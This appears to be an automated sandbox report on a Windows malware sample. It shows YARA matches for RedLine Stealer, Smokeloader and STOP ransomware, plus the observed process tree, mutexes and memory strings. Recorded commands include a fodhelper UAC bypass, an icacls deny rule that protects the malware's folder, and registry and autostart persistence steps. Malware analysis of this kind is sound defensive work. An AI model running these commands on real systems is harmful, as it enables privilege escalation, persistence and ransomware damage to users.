Source: 00000010.00000002.2845428957.00000000027D6000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.2120238789.0000000000C80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000001D.00000002.3181347032.0000000002D88000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000000C.00000002.2840455223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000000C.00000002.2840455223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: Process Memory Space: explorer.exe PID: 4004, type: MEMORYSTR Matched rule: ironshell_php author = Neo23x0 Yara BRG + customization by Stefan -dfate- Molls, description = Semi-Auto-generated - file ironshell.php.txt, hash = 8bfa2eeb8a3ff6afc619258e39fded56
Source: Process Memory Space: DB15.exe PID: 6336, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: DB15.exe PID: 7004, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: DB15.exe PID: 5368, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: DB15.exe PID: 6320, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: DB15.exe PID: 5356, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: DB15.exe PID: 4436, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: DB15.exe PID: 5988, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: DB15.exe PID: 6848, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: DB15.exe PID: 7144, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: DB15.exe PID: 3544, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: classification engine Classification label: mal100.rans.troj.spyw.expl.evad.winEXE@60/336@20/13
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 12_2_00411900 GetLastError,FormatMessageW,lstrlenW,lstrlenW,lstrlenW,LocalAlloc,lstrcpyW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,_memset,lstrcpynW,MessageBoxW,LocalFree,LocalFree,LocalFree, 12_2_00411900
Source: C:\Users\user\Desktop\6uVlPQSJ4e.exe Code function: 0_2_00D26829 CreateToolhelp32Snapshot,Module32First, 0_2_00D26829
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 12_2_0040D240 CoInitialize,CoInitializeSecurity,CoCreateInstance,VariantInit,VariantInit,VariantInit,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,CoUninitialize,CoUninitialize,CoUninitialize,__time64,__localtime64,_wcsftime,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,swprintf,CoUninitialize,CoUninitialize, 12_2_0040D240
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\gtdirat Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Mutant created: \Sessions\1\BaseNamedObjects\{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5008:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5088:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2036:120:WilError_03
Source: C:\Windows\System32\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4004
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5012:120:WilError_03
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\7F9A.tmp Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\7F9A.bat" "
Source: unknown Process created: C:\Windows\explorer.exe
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Command line argument: --Admin 12_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Command line argument: IsAutoStart 12_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Command line argument: IsTask 12_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Command line argument: --ForNetRes 12_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Command line argument: IsAutoStart 12_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Command line argument: IsTask 12_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Command line argument: --Task 12_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Command line argument: --AutoStart 12_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Command line argument: --Service 12_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Command line argument: X1P 12_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Command line argument: --Admin 12_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Command line argument: runas 12_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Command line argument: x2Q 12_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Command line argument: x*P 12_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Command line argument: C:\Windows\ 12_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Command line argument: D:\Windows\ 12_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Command line argument: 7P 12_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Command line argument: %username% 12_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Command line argument: F:\ 12_2_00419F90
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Command line argument: --Admin 17_2_00419F90
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Command line argument: IsAutoStart 17_2_00419F90
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Command line argument: IsTask 17_2_00419F90
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Command line argument: --ForNetRes 17_2_00419F90
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Command line argument: IsAutoStart 17_2_00419F90
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Command line argument: IsTask 17_2_00419F90
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Command line argument: --Task 17_2_00419F90
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Command line argument: --AutoStart 17_2_00419F90
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Command line argument: --Service 17_2_00419F90
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Command line argument: X1P 17_2_00419F90
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Command line argument: --Admin 17_2_00419F90
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Command line argument: runas 17_2_00419F90
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Command line argument: x2Q 17_2_00419F90
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Command line argument: x*P 17_2_00419F90
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Command line argument: C:\Windows\ 17_2_00419F90
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Command line argument: D:\Windows\ 17_2_00419F90
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Command line argument: 7P 17_2_00419F90
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Command line argument: %username% 17_2_00419F90
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Command line argument: F:\ 17_2_00419F90
Source: 6uVlPQSJ4e.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\AppData\Local\Temp\71C9.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
Source: C:\Windows\explorer.exe File read: C:\Users\user\Searches\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\6uVlPQSJ4e.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: build2.exe, 00000029.00000002.3579393951.000000006C64F000.00000002.00000001.01000000.0000001A.sdmp, build2.exe, 00000029.00000002.3572254159.000000001E938000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3573071758.0000000020E7C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: build2.exe, 00000029.00000002.3579393951.000000006C64F000.00000002.00000001.01000000.0000001A.sdmp, build2.exe, 00000029.00000002.3572254159.000000001E938000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3573071758.0000000020E7C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: build2.exe, 00000029.00000002.3579393951.000000006C64F000.00000002.00000001.01000000.0000001A.sdmp, build2.exe, 00000029.00000002.3572254159.000000001E938000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3573071758.0000000020E7C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: build2.exe, 00000029.00000002.3579393951.000000006C64F000.00000002.00000001.01000000.0000001A.sdmp, build2.exe, 00000029.00000002.3572254159.000000001E938000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3573071758.0000000020E7C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: build2.exe, 00000029.00000002.3572254159.000000001E938000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3573071758.0000000020E7C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
Source: build2.exe, 00000029.00000002.3572254159.000000001E938000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3573071758.0000000020E7C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
Source: build2.exe, 00000029.00000002.3579393951.000000006C64F000.00000002.00000001.01000000.0000001A.sdmp, build2.exe, 00000029.00000002.3572254159.000000001E938000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3573071758.0000000020E7C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: build2.exe, 00000029.00000002.3579393951.000000006C64F000.00000002.00000001.01000000.0000001A.sdmp, build2.exe, 00000029.00000002.3572254159.000000001E938000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3573071758.0000000020E7C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: build2.exe, 00000029.00000002.3572254159.000000001E938000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3573071758.0000000020E7C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
Source: A0B.exe, 00000017.00000003.3014458881.0000000003A95000.00000004.00000800.00020000.00000000.sdmp, A0B.exe, 00000017.00000003.3024977226.0000000001515000.00000004.00000020.00020000.00000000.sdmp, A0B.exe, 00000017.00000003.3013109239.0000000003AC4000.00000004.00000800.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3330699453.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3316385909.0000000000A0E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: build2.exe, 00000029.00000002.3572254159.000000001E938000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3573071758.0000000020E7C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: build2.exe, 00000029.00000002.3572254159.000000001E938000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3573071758.0000000020E7C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: 6uVlPQSJ4e.exe ReversingLabs: Detection: 31%
Source: DB15.exe String found in binary or memory: set-addPolicy
Source: DB15.exe String found in binary or memory: id-cmc-addExtensions
Source: DB15.exe String found in binary or memory: set-addPolicy
Source: DB15.exe String found in binary or memory: id-cmc-addExtensions
Source: DB15.exe String found in binary or memory: set-addPolicy
Source: DB15.exe String found in binary or memory: id-cmc-addExtensions
Source: DB15.exe String found in binary or memory: set-addPolicy
Source: DB15.exe String found in binary or memory: id-cmc-addExtensions
Source: unknown Process created: C:\Users\user\Desktop\6uVlPQSJ4e.exe "C:\Users\user\Desktop\6uVlPQSJ4e.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\gtdirat C:\Users\user\AppData\Roaming\gtdirat
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\7F9A.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\DB15.exe C:\Users\user\AppData\Local\Temp\DB15.exe
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Process created: C:\Users\user\AppData\Local\Temp\DB15.exe C:\Users\user\AppData\Local\Temp\DB15.exe
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce" /deny *S-1-1-0:(OI)(CI)(DE,DC)
Source: unknown Process created: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe --Task
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Process created: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe --Task
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Process created: C:\Users\user\AppData\Local\Temp\DB15.exe "C:\Users\user\AppData\Local\Temp\DB15.exe" --Admin IsNotAutoStart IsNotTask
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Process created: C:\Users\user\AppData\Local\Temp\DB15.exe "C:\Users\user\AppData\Local\Temp\DB15.exe" --Admin IsNotAutoStart IsNotTask
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe "C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe" --AutoStart
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Process created: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe "C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe" --AutoStart
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\A0B.exe C:\Users\user\AppData\Local\Temp\A0B.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\5F8F.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe "C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe" --AutoStart
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Process created: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe "C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe" --AutoStart
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\71C9.exe C:\Users\user\AppData\Local\Temp\71C9.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 4004 -s 10520
Source: C:\Users\user\AppData\Local\Temp\71C9.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C fodhelper
Source: unknown Process created: C:\Windows\explorer.exe explorer.exe
Source: unknown Process created: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe "C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\fodhelper.exe fodhelper
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\fodhelper.exe "C:\Windows\system32\fodhelper.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe "C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\fodhelper.exe "C:\Windows\system32\fodhelper.exe"
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Process created: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build3.exe "C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build3.exe"
Source: C:\Windows\System32\fodhelper.exe Process created: C:\Users\user\AppData\Local\Temp\71C9.exe "C:\Users\user\AppData\Local\Temp\71C9.exe"
Source: C:\Users\user\AppData\Local\Temp\71C9.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\7F9A.bat" " Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\DB15.exe C:\Users\user\AppData\Local\Temp\DB15.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe "C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe" --AutoStart Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\A0B.exe C:\Users\user\AppData\Local\Temp\A0B.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\5F8F.bat" " Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe "C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe" --AutoStart Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\71C9.exe C:\Users\user\AppData\Local\Temp\71C9.exe Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Process created: C:\Users\user\AppData\Local\Temp\DB15.exe C:\Users\user\AppData\Local\Temp\DB15.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce" /deny *S-1-1-0:(OI)(CI)(DE,DC) Jump to behavior
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Process created: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe --Task Jump to behavior
